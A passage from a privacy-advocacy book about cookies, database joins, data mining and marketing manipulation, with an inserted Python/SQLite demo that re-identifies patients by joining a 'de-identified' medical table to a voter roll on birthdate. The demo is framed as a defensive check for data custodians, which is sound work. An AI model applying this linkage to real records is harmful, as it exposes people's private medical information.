
"First Understand How Bad It Is"
And all that the Lorax left here in this mess was a small
pile of rocks with the one word…
“UNLESS”
Dr. Seuss, The Lorax
The Illusion of Privacy
On May 22, 2002, before the spyware epidemic began in 2004 and long before the mass deployment of botnet nodeware, an interesting debate arose at the Check Point User Experience event in Dublin. The issue concerned network intrusions of home computers that are connected to cable modem or DSL lines. “I think every single user at home gets 200 attacks every day,” said Gil Shwed, Check Point’s CEO. That contrasted with commonly accepted data, which suggested at the time that the correct average figure is ten attacks per day. Only ten attempted trespasses into our homes by unknown strangers every day!
What accounted for the difference? According to Aaron Goldberg of Ziff Davis Market Experts, “The ‘200 attacks’ remark was based on the numerous alerts users see after they install a firewall or intrusion detection system. If all these were malicious attacks, it would require a hacker community much larger than is believed to exist, running multiple port scanners. In reality, many of these alerts are sites scanning for cookies rather than attacks—a privacy issue but not one to panic over,” said Goldberg.
Our home computers were being intruded upon typically 190 times a day, but that’s merely a privacy issue and therefore nothing to worry about. Furthermore those intrusions are not just bored individuals poking around; they represent an organized search for information in our cookie files. In other words, they are digging for information about what we do with our lives, what we purchase, what sites we visit, even perhaps whom we correspond with. But they’re not “malicious attacks.”
Steven J. Schugart Jr., commenting about intrusive advertising in Network Computing, notes that
More disturbing is the spyware and usage-tracking cookies used by vendors. In my role as technology editor, I do a lot of research on the Web, bouncing from site to site. Because of the illegal Trojans used by too many sites, I have had to invest in a program called Ad-Aware by Lavasoft. It sweeps my system for known spyware and usage-tracking cookies. Take a look at the demo version and run it on your system. You will be appalled.
Some of these infractions are so egregious that my antivirus program picks up on them. The use of such tactics is tantamount to theft of services . . .
And consider this: As our privacy rights melt away in the heat of our patriotic fervor, companies are going to use the FBI’s continued efforts to invisibly monitor our cyberactivities as a shield. I can already hear the spin: “Our software is considerably less intrusive than the FBI’s Carnivore and Magic Lantern.”
And why would such an intruder stop with cookies? If they’re going to poke around without permission, they might as well look at our schedules, contacts, and perhaps search our word processing and mail files for the occurrence of select words and phrases.
Much has been made of the FBI’s Magic Lantern program, which captures keystrokes of people whom the FBI wants to monitor. The keystrokes of greatest interest, of course, are those that make up encryption passwords.
Magic Lantern has been compared to commercial key loggers such as Ghost, but there are two big differences between Magic Lantern and key-logging software. The first is that Magic Lantern is propagated as a virus. The FBI is in the business of planting viruses in the computers of those whom it wants to monitor, viruses that are sent via the time-honored method of infected email. The second difference is that key-logging software is a product, not a practice. It is not evil in itself—parents may legitimately need to know what’s going on in their young children’s chat sessions. But key logging can also be used by a thief to snag an online banking password. How it’s used determines the product’s legitimacy.
But there’s another side to the story. Before we condemn the FBI, and for that matter all in law enforcement who snoop on online communications, consider what they are up against. Global village communications facilities have made the job of the international wholesale drug trafficker or terrorist or identity thief much more efficient, and encryption ensures that those communications cannot be read by others.
The fact is that the U.S.’s FBI, Secret Service, NSA, CIA, ATF; the UK’s SOCA, MI5 and GCHQ; Canada’s CSIS; France’s DGSE; and numerous other agencies must be able to snoop when the situation legitimately calls for it. Consider the very unsettling possibility, or perhaps probability, that a plan for use of a suitcase nuclear weapon in a major city is being discussed in some online communication right now. Even the most strident privacy activists would not want to categorically deny the right of law enforcement to intercept that communication.
Often the abridgment of the rights of suspects is cited as a dangerous Information Age phenomenon. In fact Thomas Jefferson himself acknowledged in his pursuit of members of the Burr/Wilkinson conspiracy that the liberties of unconvicted criminal suspects must of necessity be compromised. In a court of law, Aaron Burr was considered innocent until proven guilty. That didn’t stop Jefferson from intercepting Burr’s written communication and interfering with his freedom of movement in order to have him brought to trial (where he was acquitted).
The good news is that we have a means of reducing abuses of such powers, while at the same time solving a serious problem for law enforcement. That solution is based upon something that is viewed by many as the antithesis of privacy: the universal ID. We will show, however, that a combination of a properly designed universal ID system, with a PKI built upon a properly designed and governed certification authority, is actually our greatest hope for truly meeting the long-articulated goal of allowing individuals to keep control of the use of information about themselves. If we are to have such control, we must have a place from which to exercise it. Properly designed, a universal ID system can be a bulwark of our privacy rather than an eroder of it.
A reliable, universal identity credential gives us a means by which the use of police powers in monitoring online communication can itself be monitored and limited. Later we will give the specifics of the Law Enforcement Infrastructure, one of the twelve components of the Quiet Enjoyment Infrastructure. The Law Enforcement Infrastructure accommodates both the need for privacy and the need of law enforcement to monitor communication among those whom due process permits to be considered suspected criminals. Most importantly, it allows law enforcement to do its job while providing a means to ensure that the power it conveys is not abused.
But let us not allow the issue of government ability to monitor communication among suspected criminals to distract our attention from the activities of those who have already succeeded in knowing much of what everybody is doing and have furthermore learned how to use that information to influence the decisions of huge numbers of people.
Your Choice
Privacy activists often focus on policy for organizations that allow themselves to be governed by policies. While they’re busy doing that, an assortment of “cookie clubs” that laugh at the notion of privacy policies dig through the files that reveal the details of our lives. Your cookie files are much more valuable to nosy organizations than are utterly unnecessary pieces of “index” information, such as your social security number.
Will you control your own life? It’s a simple, binary choice—yes or no. There are no shades of sort-of or almost to mitigate the starkness of the choice. This is all or nothing. If you don’t act, then ask yourself, who will be in charge? Will it be a monolithic entity more frightening than anything ever conceived by George Orwell?
Who Will Control Your Life?
You may think that’s overly dramatic. After all, the subject is privacy. We’re only talking about information, right? The junk mailers and others who use information about you don’t control your life, do they? Surely they just add an element of annoyance to it. Besides, a growing awareness of privacy concerns will result in meaningful privacy policies and laws that govern the intrusive activities of the companies involved and the use of their databases, won’t it?
The answer is that this is about more than annoyances. To begin with, it’s about access to the most intimate details of your life. On a more sinister level, it’s about the ability of those who have information about you to manipulate and control you.
As a solution to the particular problem described in this chapter, privacy policies and laws are as meaningless as would be a law prohibiting the AIDS virus. Let’s look at some of the difficulties presented by technological innovation that prevent quick and easy remedies.
What Law?
Right now gambling operators and pornographers operate websites on servers in various Caribbean islands and third world countries. Their services are offered to any users, including American citizens, who come across their site. But everything about the service and the transactions takes place offshore, using a foreign banking system to process credit card transactions. Unlike old-economy crooks, who set up false offshore addresses for illegal activities that really take place in North America or Europe, the operator of such a website is established in the third world host country.
If the website operator happens to make his or her services available to anyone with a computer or wireless information appliance, regardless of location, then it is the user who transgresses, not the site operator. By anyone’s standard, the operators are governed by the law where their services originate, not by the law in the venue of some remote user. And what if their host nation changes its view of such matters? That’s easy: if one third world government decides to crack down on offenders, a backup server in another developing country can be ready to take over in a heartbeat.
We all know that Internet traffic and activity knows nothing about national boundaries. Why then, when it comes to policy and regulation, do our discussions assume that governments and legislation are of any relevance?
What Company?
Companies have charters, officers, boards of directors, and balance sheets to which they are held accountable. Most companies will bend over backward to avoid putting their assets and officers and branded reputations at risk. But what happens when a middle manager at one of those companies is under pressure to improve his unit’s performance? And what if he discovers an unnamed club, devoid of physical location or membership roster, where he can barter his customer information for information from unnamed other sources and thereby get the advantage he needs in order to make his numbers? When the pressure intensifies, the trade will take place.
There is a famous story about IBM approaching the owners of the Apache open source Web server software product, which IBM wanted to use as part of its WebSphere product. Hard as it tried, IBM could not find the company that owned this market-leading product because no such company existed. Apache was developed by a club, a group of people dispersed around the world, many of whom had never met one another. There was no legal entity for IBM to negotiate with. This is how open source development typically works; in this case, it is a club with clear visibility and nothing to hide—a marvelously productive gathering of some superb developers.
Expect to see a proliferation of such clubs. Know that for every such club that has clear visibility and nothing to hide, others exist with no visibility and plenty to hide.
When he was chief executive officer of Sun Microsystems, Scott McNealy famously called consumer privacy issues a red herring. “You have zero privacy anyway. Get over it,” he told a group of reporters and analysts at a January 1999 event to launch his company’s new Jini technology. Under pressure from privacy activists, McNealy has since backpedaled in his public pronouncements. What are the chances that this powerful shaper of information infrastructures has really changed his mind and his values? How many of his less-outspoken peers think and say similar things when they’re safely away from the microphones?
The answer can be seen in their naïve and carelessly constructed identity schemes. If we are to have privacy then we must be our own grassroots engineers of our privacy systems. We’ll get no help from the McNealys.
What Databases?
Two or more big, costly, established customer databases with the finest government-regulated corporate pedigrees and privacy statements can mate, in the middle of the night, on a server on some Asian outpost, producing a “join” that is not accountable to anybody.
Most “data banks” are collections of tables of information plus some procedures for using them, collectively called relational databases. A “join” is part of an operation that finds records of interest from two tables, using specific criteria.
Joins are ephemeral—they happen and then they vanish. Their progeny is a bit of combined information that then might be part of another table. That table, after perhaps mating with another dozen or so products of such joins around the world, might start to form a very revealing picture of a person or organization or other entity.
Joins are fun to play with and can be immensely powerful. Tracking down their source can take months and years of intelligent sleuthing, during which time another few thousand generations of joins have come and gone and wreaked their havoc. Databases are meek; joins are powerful.
Law, organizational accountability, and nicely bounded and identifiable collections of information are comforting concepts when our privacy is threatened as it is today. But these concepts, as they are typically invoked by those who comment on privacy issues, can be meaningless. We’ll see that:
Instead of useless legislation, we need new applications of existing intellectual property law that are reasonably enforceable across national boundaries;
Instead of useless privacy statements and impossible enforcement challenges, we need to claim our information as our property and treat those who steal it as thieves;
Instead of looking for abuse of our information while it’s at rest in databases where it appears to be fairly well cared for, we need to track it down as it’s dragged around the seamy hangouts of the tabular sex trade. We should regard our personal information as an abducted daughter.
Mass Manipulation
Invasion of privacy is an “in” topic these days. The standard concern seems to be how to prevent annoying and unsolicited mail. At the other end of the spectrum, journalists, companies, and individuals are expressing their concern about preventing disclosure of personal medical and financial information. But the consequences of loss of privacy do not stop with privacy loss itself. That’s just the first step. Industrial psychologists know that if I can know enough about you and I have some access to your perceptions, then I can control you.
How vulnerable are we humans to manipulation? Can we be made to do things we would never do of our own accord? On a mass scale, history shows that the answer is yes.
How did the Third Reich come to power and get the German people to acquiesce to its unbelievably inhuman agenda? Did a psychopath named Adolf Hitler find a capable and amoral propaganda minister who could inflame the masses? Or did a master manipulator named Josef Goebbels go in search of a convenient psychopath to implement his plan to leverage some emotional capital—Germany’s residual national psychological instability—after the First World War?
Practitioners like Goebbels used new kinds of media to move masses to act on their basest feelings of national anger. Goebbels and the media industry of the day believed that it was impossible and unnecessary to shape the perceptions of single individuals. Rather, one had to send out messages to be digested by millions of people at a time. Today in democratic, developed, happy consumer-driven cultures such as ours, mass media is used to move masses to believe in the necessity of food processors and the notion that one’s personal identity is defined by the purchases we make: a BMW, Prada shoes, an SUV, an IKEA chair, an Armani suit, a Madonna CD, an NSync Spiderman action figure . . . one only has to sit down for 139 minutes of the film Fight Club to feel the degree to which we have truly become products of our times.
The junk (paper) mail industry shares many of these mass-media beliefs. But they have been attracted over the last few decades by the tantalizing results of what has been called database marketing. Database marketing started out as a way to make mailings more effective. A company would send out mailings with, say, four different messages and three different offers on a few different days of the week to names on a half dozen different lists, with different “selects” from each list. With the tools of a relational database, one could quickly discern which combinations produced the most successful mailing.
As the science of database marketing progressed, and the intersections of the growing number of tables became better understood, marketers were able to come closer and closer to their ideal of being able to mathematically predict the probability that, given certain things affecting your perceptions, you would behave a certain way.
And now, the more forward-thinking direct-mail experts look to the day when behavior is tracked, predicted, and manipulated on a “list” containing only one name. Based upon a detailed knowledge of a person’s past actions, a piece of mail could be so targeted to that individual that it would strike precisely the nerve it had to for a response.
This, in fact, is the goal of “one-to-one” marketing. First described by Don Peppers and Martha Rogers in their book The One to One Future, one-to-one marketing’s goal is commendable: to provide each and every one of a company’s customers with the kind of personalized service that one would expect from a shopkeeper down the street in a village where one had lived for years and where one’s preferences were well known.
As long as we personalize the phenomenon in that way, it’s a wonderful idea: Old Mr. Peebles, who runs the village bookstore, knows I like Grisham novels. When a new one comes out, he makes sure there’s a copy reserved for me and that I know about it.
But it’s not old Mr. Peebles, it’s a software robot at Multimegamedia Ltd. The software robot does “data mining” on many tables in many databases about me. The software robot does not know me and does not want to know me. It does, however, want to get better and better at predicting what I will do, given what I’ve done in the past and what Web pages and other information guided my perceptions before I did those things.
Multimegamedia has a strong privacy policy statement, which one would assume limits it from sharing information about you. Not so fast. Multimegamedia also has tens of thousands of “partners,” and their partners have partners, who run clubs and clearinghouses, and they know precisely how likely I am to passively accept their monthly book selection rather than make the effort to select my own. (Those are very valuable data to a marketer.) They also know everything my cable TV company knows about me; they know what TIVO knows about what television shows I have watched; which of those I consider important enough to record; and, for that matter, they have access to the times and dates and locations of all my credit card transactions; and so much more.
Multimegamedia, technically, does not share data with “others.” The uncounted numbers of attempts to contact you by phone or mail or email or pop-up window to get you to do something will not come from outsiders with whom they have shared data. No, they will come from subsidiaries and partners. And if you will look closely at paragraph 156(Q)33, you will see that the privacy statement clearly says that sharing information about you with their partners is not really considered sharing at all. (Oh by the way, the state turnpike authority, which must record your comings and goings in order to bill you correctly for the use of your toll-pass device, is a “partner” of Multimegamedia.)
In implementation, we see one-to-one marketing take forms where, for example, an online retailer knows with a fair amount of certainty that a given customer has never seen a particular price on a product, and that the customer has shown a propensity to pay a high price for similar products. Instantly, a “special” (high) price is created just for that customer.
Online implementations of the one-to-one methodology don’t have to take forms that invite manipulation of users. If you marry the concept of “opt-in” marketing with one-to-one, you could have the best of both worlds. Opt-in refers to the practice by which a consumer explicitly grants marketers whose products have interested them access to his or her personal information. The value of this approach exists only if the marketer is restricted to information about you that is accessible to you, information that is genuinely under your control. And in fact that can be done, using methods described later in this book. The methods are not naïve—a marketer can sustain a business with them.
Traditionally, marketing databases had been built upon information about responses to mailings. These responses will not define an individual beyond a certain point. But if you augment the information with a detailed record of the websites visited by the individual, where on the Web and in the physical world they have used their credit card, and other easily retrieved data, you start to get a more detailed picture of the person. Data acquisition techniques get more comprehensive and more powerful all the time. But the real break from the limitations of mass media comes not with data acquisition but with the interpretation of the data.
In the old days it took an experienced and intelligent human being to analyze data about you and make predictions about your behavior. (“If I send him information which alters his perception in such and such a way, he will do such and such a thing.”) Now, software makes the process of pattern recognition considerably faster and vastly more economical. The software can analyze the patterns of a hundred million people almost as easily as it does a single person. Where the human mass marketer might come up with a few dozen profiled categories of people that the hundred million fall into, the software robot can come up with a hundred million profiles and a hundred million sets of directions to other robots, each of them saying, “This person has been exposed to this and this information and has done such and such in the past; if you present this further information on these three dates, there is an 87% probability that the person will do what we want him to do.”
This view of the privacy problem is based on the knowledge that every human being’s behavior can be manipulated if you know enough about the person to control his or her perceptions—nobody is immune.
Professionals in the intelligence community must know that this applies to them too, because control of perceptions is one of the essential tricks of that trade. Advertising professionals know that they themselves are vulnerable to the efforts of their colleagues—Advertising Age magazine is full of advertisements, directed at professional advertising magicians who certainly know the power of perception control.
For the most part, though, people who are not in the business of manipulating perceptions tend not to recognize their own vulnerability. We all want to believe that as rational human beings we are not susceptible to thought control. “That’s for the masses, not for me,” says every member of the masses. A simple test reveals the truth: only those who are never fooled by a magician can make the claim that their perceptions are not subject to manipulation. Have you ever been fooled by a stage magician?
Don Peppers and Martha Rogers, The One to One Future: Building Relationships One Customer at a Time (New York: Doubleday, 1993, 1996).
An Example of Modern Media Manipulation Magic
Let’s say I want to chop down ten thousand acres of forest. Four thousand individuals live in the area affected. Five hundred individuals appear at the intersections of some tables that define people who make decisions about the use of forests in the area. Twenty people at the intersections of these groups have credentials in the life sciences. One of the objections to cutting down the forest has been the destruction of the habitat of a certain mammal.
Now, can we find (or concoct) evidence that the mammal in question is a host for the deer tick that causes, say, Lyme disease? Can we orchestrate a series of communications to manipulate the perceptions of those twenty life scientists and frighten them into thinking that we have a deer tick epidemic on our hands?
Certainly we couldn’t do that with old communication tools; the effort would be clumsy and obvious. Certainly we can by deftly using today’s database and targeted communication tools. We simply have to make a series of pseudo-facts appear as though they are coming from legitimate sources.
But the challenge is not just to find the twenty life scientists. That’s old hat to database marketers—it’s been done for years. No, the very special challenge is to come up with the answer to the question, “Now that we have identified the twenty people we need to influence, how do we find all of the sources of information used by these people?” By discovering the sources they consult to form their opinions, thought control becomes more and more possible. Once they have been converted, they will influence their neighbors.
If the story of the epidemic were to come from anyone else, its credibility would be less than the strongest possible. Instead, the story of the epidemic will arrive at the journalists’ doorstep from the mouths of concerned local life sciences professionals, not from the PR machine of the greedy paper company that wants to tear down the forest. The result? In the eyes of the public, the forest, if left standing, will go from a source of inspiration to a tainted, troubled, infested wasteland—one of those places you need to keep your kids away from. That alone won’t make people want to cut it down, but it will be enough to limit the support for those who oppose the cutting of the forest. Mission accomplished.
Orwellian Joins
When a skilled writer like George Orwell builds a plot around an evil entity, he personifies it. He gives it a name. After all, how can a villain contribute to a plot if he cannot be vilified in a reader’s mind?
It is hard to be passionate about a database—hard, that is, if you don’t have one. But some people have a piece of a database that is part of a powerful source of control over the lives of every human being in the developed world. And as Lord Acton observed, “Power corrupts; absolute power corrupts absolutely.”
Real live human beings are at work building this immense source of power. It is not the Internet. It is not, in the lexicon of technologists, a database. But in the lexicon of lexicographers the term database really means something broader than its narrow use in technology jargon:
Database, n.: an organized body of related information
A library filled with shelves of books all related to a particular industry or academic discipline is a database. A collection of tables all related to a particular thing is a database. If you’re not familiar with databases, you can still easily understand what this is all about. Start with a “table,” which is just what you think it is: information arranged in rows and columns.
Technologists often use the same word “database” to refer to two different things: (1) a collection of tables of information and (2) the software that manages those tables in order to sift through information—perhaps about you—and compare and merge it with information from other databases. To be accurate, though, the latter is a database management system, not a database.
But the real definition of the word “database” tells us that a collection of hundreds of thousands of cells in tables about you, housed on different servers in different parts of the world using different operating systems and different management systems is, in fact, one database about you.
The technical term for information about you is PII—“Personally Identifiable Information”:
The concept of PII—the idea that data belongs in a special class when it is tied to an actual, identifiable human—is especially helpful when we try to come to grips with questions involving privacy, technology, and commerce. PII is like uranium: quite valuable, but more than a little dangerous when it falls into the wrong hands. It has become so important that Wall Street analysts are valuing some companies based on the quantity and quality of their customer PII profiles; privacy advocacy groups and governmental regulatory agencies around the world are closely monitoring PII collection and use, and considering a staggering amount of new legislation; software developers are reengineering their products to become “PII-compliant”; even new sniffers (the network analysis tools used by software engineers and hackers) are in the works for the express purpose of tracking PII inside large information systems. Yet most users of the Internet, even active ones, have very little idea what PII is, how it is collected, where it is stored—or even why it is important.
At an e-business conference at the former Fleet Bank in Boston, a concerned statistician cited a medical study of the residents of Cambridge, Massachusetts, to show how revealing just one table can be. In response to concerns about protection of the privacy of the subjects, the study’s author noted that while he had privileged information on the medical backgrounds of almost all residents, all names and addresses were deleted from the records—“only” birthdates were left. The statistician then noted that in a random sample of 100,000 people, 12 percent have unique birthdays. If I have only that one table, and I acquire the city’s public voter registration records, a simple sort lets me know something I should not know about the medical backgrounds of the voters among those twelve thousand people. And more tables are always available.
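The following script is an added illustration, not from the book, of the join described in the earlier section and of the birthdate linkage just recounted. It builds two constructed tables in an in-memory SQLite database (a "de-identified" medical table that kept only birthdates, and a public voter roll), runs the join, and shows which records a data custodian should expect to be pinned to one named person, first on the full birthdate and then on the birth year alone:

```python
import sqlite3
from collections import Counter

# Constructed sample data (not from the book). The "de-identified" medical table
# kept only birthdates; the public voter roll carries names, addresses and birthdates.
MEDICAL_ROWS = [
    ("1961-03-14", "hypertension"),
    ("1975-11-02", "asthma"),
    ("1975-11-02", "diabetes"),   # two patients share this birthdate
    ("1988-07-29", "depression"),
    ("1990-01-05", "migraine"),   # nobody on the roll has this birthdate
]
VOTER_ROWS = [
    ("A. Example", "12 Elm St", "1961-03-14"),
    ("B. Example", "4 Oak Ave", "1975-11-02"),
    ("C. Example", "9 Pine Rd", "1975-11-02"),
    ("D. Example", "31 Main St", "1988-07-29"),
    ("E. Example", "7 Birch Ln", "1961-09-18"),   # same birth year as A, different date
    ("F. Example", "2 Cedar Ct", "1988-02-11"),   # same birth year as D, different date
]


def build_db() -> sqlite3.Connection:
    """Create both tables in an in-memory SQLite database and populate them."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE medical (birthdate TEXT, diagnosis TEXT)")
    conn.execute("CREATE TABLE voters (name TEXT, address TEXT, birthdate TEXT)")
    conn.executemany("INSERT INTO medical VALUES (?, ?)", MEDICAL_ROWS)
    conn.executemany("INSERT INTO voters VALUES (?, ?, ?)", VOTER_ROWS)
    return conn


def unique_birthdate_share(conn: sqlite3.Connection) -> float:
    """Fraction of medical rows whose birthdate occurs exactly once in that table
    (the small-sample counterpart of the book's '12 percent have unique birthdays')."""
    counts = Counter(row[0] for row in conn.execute("SELECT birthdate FROM medical"))
    unique = sum(1 for c in counts.values() if c == 1)
    return unique / sum(counts.values())


def reidentify(conn: sqlite3.Connection, key: str = "{t}.birthdate") -> list:
    """Join the tables on `key` and keep only matches where the key value is unique
    in BOTH tables, i.e. where a diagnosis can be pinned to exactly one named voter.

    `key` is a SQL expression with a `{t}` placeholder for the table alias, so the
    same query evaluates the full date and coarser keys such as the birth year.
    """
    k = key.format
    sql = f"""
        SELECT v.name, v.address, m.diagnosis
        FROM medical m
        JOIN voters v ON {k(t='m')} = {k(t='v')}
        WHERE (SELECT COUNT(*) FROM medical m2 WHERE {k(t='m2')} = {k(t='m')}) = 1
          AND (SELECT COUNT(*) FROM voters  v2 WHERE {k(t='v2')} = {k(t='v')}) = 1
        ORDER BY v.name
    """
    return conn.execute(sql).fetchall()


# A generalized quasi-identifier: releasing only the birth year instead of the full
# date enlarges the group each record hides in, so the join no longer isolates anyone.
BIRTH_YEAR = "substr({t}.birthdate, 1, 4)"


if __name__ == "__main__":
    db = build_db()
    print(f"unique birthdates in medical table: {unique_birthdate_share(db):.0%}")
    print("join on full birthdate:", reidentify(db))
    print("join on birth year only:", reidentify(db, BIRTH_YEAR))
```

Before releasing any table, the same join against whatever public rolls exist tells the custodian how many of its "anonymous" rows are in fact unique; the birth-year run shows the kind of coarsening that closes the gap.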
The database about you is very, very large. It includes information about where you used your credit card last night, what you bought with it, where you clicked on the Web, what you downloaded, what books you bought, what cause or political party or charity you contributed to. Don’t worry that the tables are not linked right now. When someone needs to link them, they will be linked. It is not, as they say, rocket science.
Try it yourself on the database management system in the office suite software on your computer. Look for Microsoft Access or its equivalent. Create some tables and see what you can do with them. (This is a very worthwhile activity, because knowing how a database works is this century’s equivalent of knowing addition and subtraction. It is much more important than knowing about “computers.” You can know very little about computers and get along just fine as long as you know how to use a relational database and a few other things.)
The Sex Life of Tables
Stephen Hawking
If computer viruses count as life, they are primitive, asexual organisms. Table joins like the ones discussed here can constitute a more highly evolved, sexual, and potentially more powerful life form.
At this point I would love to cite statistics about how many tables around the world contain information about you. A more important figure would be how often those tables mate with each other to generate relational DNA for infant software robots whose only role is to know what you are likely to do next and how that event can be influenced. Unfortunately, there is no way to get that information. The sex habits of relational databases are as private as privacy policies are public. You and I will probably never know.
Daddy, Where Do Baby Tables Come From
When we fill in a form or a directory or a database table with information, we use the verb “to populate.” We populate a database. That curious choice of terms was made long before there was tabular sex to write about, so someone somewhere was remarkably prescient. Prescience aside, we should spend a little time learning how these tables of information about you come into being. Where does all that information come from? We’ve mentioned one source of course: the “lost” or “stolen” laptop that contains a duplicate of a corporate database with millions of customer records. Others include the following (this list is far from exhaustive):
Sharing Cookies
Open Pit Mining
Phishing
TIA-ing
Parasites
Harvesting Visited Links
Open Pit Mining
The profession and sport of data mining is all about seeing what happens when tables are made to intersect with one another. Data miners don’t want to know one little thing about twelve percent of their sample. They want to know everything about everybody. And isn’t that just how people are? People are nosy, and people like power. The sport of data mining serves both impulses. Add to that the sport of “target marketing,” which started out innocently enough but which has come to mean “control of perceptions of individuals,” and you have information power in spades. The power of these techniques can be difficult to grasp if you have never fiddled with database tables. It’s natural to think that the main reason to be concerned about privacy is a desire to reduce the amount of intrusive marketing messages coming at you.
Look again, closely, at this section of the excerpt from the Fena and Jennings book:

What accounts for that characterization of the power gained by ownership of personal information? Why are collections of PII so valuable? After all, anybody can rent a mail list. What makes it dangerous?
It is dangerous, of course, because it can be used to manipulate our perceptions.
It is essential that we take measures to neutralize the threat to our privacy, to our very autonomy—our ability to inform ourselves and make good choices for our families and ourselves. The good news is that it is quite possible to solve this problem and to solve it without spending great amounts of time and energy reading privacy statements and advocating for protective legislation. The solution is the Quiet Enjoyment Infrastructure—QEI—described in this book.
Later we will discuss other digital life forms. Let’s hope they don’t cross-breed.
Cookie Clubs
An Internet “cookie” is not a dessert but a piece of information planted in your computer by a site you visit. Cookies can be very useful not only for the site but for you as well, providing among other things a kind of session-like continuity and connectedness in the otherwise “stateless” Web. When discussing the benefits of cookies versus their potential for erosion of privacy, technologists and journalists tend to focus on the cookie as a record of a user’s activity separate from other records about that person. Viewed that way, cookies are typically fairly harmless. But why would we view them that way? Even if the typical plan for the use of cookies is not overly intrusive, should we not be more concerned about the less common, much more intrusive use of cookies? Most fissionable nuclear material is produced to generate electric power. Does that mean we needn’t concern ourselves with the lesser amount that is headed for some other purpose?
In fact, an Internet cookie is something so insidious that its very name reveals the cynicism of those who perpetrated it. You can just hear the big-brother-wannabes in the meeting room of their cabal (comfortably removed from the Internet highway, to be sure). Picture a mad scientist in a dark castle asking his assembled sycophants, “What can we call this snooping device that will make it sound innocent? Mom? Home? Nah, they’re too obvious, people will start to wonder. Wait, I’ve got it! Cookie! What could be friendlier and homier than a cookie? Yet the connotations aren’t so obvious that the word will cause people to stop and think what we’ve got up our sleeve….”
A cookie is a piece of information that is written into your computer by a website for the purpose of tracking your activities.
What happens if I collect information on you by means of cookies and share that information with another party, say, a credit card processor, in exchange for some reciprocal sharing, and the two of us have similar relationships with others in a chain that includes thousands of companies and nonprofit cooperatives, such as credit bureaus? The result is a loosely unified record of everything you do, every place you go, and anything you buy.
But it’s more than that. If you express yourself by contributing to a cause or a political party, does that information make it into the Cookie Club? Of course it does. In many ways this database about you is a record of your thoughts as well as your actions.
Information can be collected without cookies. Cookies just make it so much easier. Let’s say a particular computer is used by an adult and a child. The adult visits a site and responds to an offer of personalized items for the family. The adult fills in a form, providing name, address, phone number—and perhaps the child’s name. The site also places a cookie. Later, the child goes to an apparently unrelated site to play games and grab some images of dinosaurs to use in a graphics program like KidPix. That site also places a cookie.
Well, it turns out that the two sites are owned by two cooperating companies. It’s true, if you examine the cookies they are only feeding information back to the server that placed them. After the two cookies are placed and the information is gleaned, a very simple little program operating in the back room of the company or companies that run the servers adds one and one together and easily builds a record about that child and her family.
Now, there’s nothing preventing the organization that placed that cookie from adding that snippet to a database of thousands of such snippets about you. There is nothing preventing groups of such organizations from sharing such databases of snippets to put together an even more complete picture of you, your habits, your desires, and your most personal secrets. Let’s face it, if I know when you go online and what you do while online, I can use that information to exercise a startling level of control over your life.
But why assume just two sites? Picture a hundred sites cooperating to build that database. Pretty soon a bunch of meaningless stray cookies have produced an intimate and detailed profile of every member of your family.
The threat to your privacy is not a database as technologists and privacy activists define it. Rather, the threat to your privacy is the intersection of tables from many databases. True, each of the contributing tables is compiled and owned by an identifiable organization that can be held accountable. But nobody owns the place where all those tables intersect. That place is the lair of the monster that wants to devour your freedom.
Poisoned Cookies
Think for a moment about the implications of the cookie trail your children leave behind. Deirdre Mulligan, Staff Attorney for the Center for Democracy and Technology, reporting in APSAC Advisor, notes that:
The ease with which children can reveal information about themselves to others—through the click of their mouse, or through participation in games, chat rooms, penpal programs, and other online activities—raises concerns. As a child ‘surfs’ from one website to another their movements leave behind a trail . . . these interactions often occur without parental knowledge or supervision. This has particularly troubling ramifications for children’s privacy. The Federal Trade Commission‘s Privacy Online: A Report to Congress delivered to Congress in June 1998, detailed some troubling practices by commercial websites targeted at children. They found that while 89% of children’s sites were collecting detailed personal information from children, only half had an information practice statement of any kind, and fewer than a quarter had a privacy policy notice. Only 7% of sites collecting information from kids notified parents of the practice, and only 23% even suggested that children speak to their parents before giving information.
Sites targeted at children tend to be costly because they have to be extremely intuitive, graphical, and responsive. They must include a lot of interactive items like games to capture and keep a child’s attention. They tend not to be amateur productions put together by people without the awareness or resources to consider things like privacy provisions. In other words, the stealthy nature of kids’ sites is quite intentional.
Let’s assume that the operators of such sites “only” want to build databases of information about your child so that they can exercise an unprecedented level of control over his or her perceptions, i.e., mold the thinking of a customer to be permanently profitable for decades. Let’s try to assume that none of them—none of the thousands of such sites—ever stoops to selling such information to organizations such as Boylove, which advocates for the “rights” of adults who want to have sex with young boys.
That is as much as to say that none of the owners of those sites ever gets into a financial situation where they need new sources of cash badly enough to do things they wouldn’t do otherwise. In fact, experience tells me that more than one of those sites will succumb to pressure to sell information to unethical organizations. Perhaps it’s already happened.
Let’s say one of those is a genealogical site: a complete network of families and family members, including the very interesting mothers’ maiden names. As you probably know, one’s mother’s maiden name is a standard data item used to validate the identity of someone calling customer service when they’ve forgotten a password. If you can come up with the maiden name of the mother of the user, you can reset the password.
The formal cookie establishment has come under some scrutiny and has changed its ways a bit since the following was written:
To summarize, although surfing the web feels anonymous, it is not. The technology underlying web browsing makes it possible for web sites to collect varying amounts of personal information about each user of their sites without consent. The TRUSTe Project, a joint effort by the Electronic Frontier Foundation and CommerceNet, proclaims a first principle of Internet commerce:
Informed Consent is Necessary — Consumers have the right to be informed about the privacy and security consequences of an online transaction BEFORE entering into one.
Current technology violates this principle. However, the Anonymizer provides a partial solution.
What the Cookie Establishment Has to Say
If you inquire about cookies from the cookie establishment, they will tell a wonderful story.
“You can turn them off.”
Well, why didn’t you tell me they’re there in the first place, and why didn’t you tell me how to turn them off? And what happens if I turn them off? Does my computer still work?
“Yeah, sure, but I wouldn’t bother because they’re innocuous.”
It is a matter of opinion whether you can still be productive with your computer in the age of the Web if you turn your cookies off or if you choose to be notified each time a cookie is placed in your computer. Choosing to be notified when cookies are placed will slow you down to a crawl. And it is true: most cookies would be innocuous if they existed only by themselves.
Can you see the brilliantly devious design here? Let’s say you turn cookie notifications on. Every other time you click, it seems, another cookie message pops up:
XYZ.com would like to place a cookie that will only be read back to itself and will last two days.
Set cookie?
And so you say, yeah, sure, what’s the harm of this one. And the next dozen times you click the message is about the same, nothing alarming.
Every day, every time you use the Web it’s the same tedious thing—get message window, click to permit a harmless cookie or click to not allow it. If you don’t allow it you may not get to see the page you wanted to see, so you generally let some mysterious robot set the cookie and be done with it.
The process gets tiring. After a while you turn the cookie notifications off. You may feel a little uneasy about doing that, but those cookie notification windows just drive you nuts.
I don’t know anyone who keeps cookie notifications active permanently. No one can stand them. That’s why people would miss the one-in-five-hundred message that says something like:
